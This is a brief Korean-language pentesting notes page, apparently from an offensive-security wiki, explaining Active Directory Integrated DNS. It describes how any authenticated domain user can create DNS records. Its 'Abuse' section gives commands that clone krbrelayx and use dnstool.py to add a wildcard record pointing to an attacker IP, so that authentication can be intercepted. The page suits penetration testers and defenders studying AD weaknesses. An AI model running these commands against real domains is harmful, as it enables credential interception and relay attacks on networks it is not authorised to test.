ADIDNS

ADIDNS(Active Directory Integranted DNS)는 DNS 존 데이터를 AD 데이터베이스에 직접 저장하는 방식입니다.

일반적 파일 기반의 DNS와 달리 레코드가 AD 객체로 CN=MicrosoftDNS 컨테이너 하위에 저장되며 AD 복제를 통해 도메인 컨트롤러 간 동기화가 됩니다.

도메인에 인증된 사용자는 누구나 DNS 존에 새로운 레코드를 생성할 수 있는 CreateChild 권한이 있습니다.

스크립트 등에서 호출하도록 등록되었지만 관리되지 않아 만료된 도메인이 있을 경우, 공격자는 해당 도메인을 직접 ADIDNS로 생성하여 인증을 가로챌 수 있습니다.

Abuse

# dnstool 및 krbrelayx 설치
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx

# dnstool을 통한 도메인 등록
python3 dnstool.py -u 'DOMAIN\user' -p 'password' -r '*' --action add -d '<attacker-ip>' '<dc-fqdn>' -dns-ip '<dc-ip>'

PreviousWebDAV NextKerberoasting

Last updated 1 month ago

hashtagAbuse

Abuse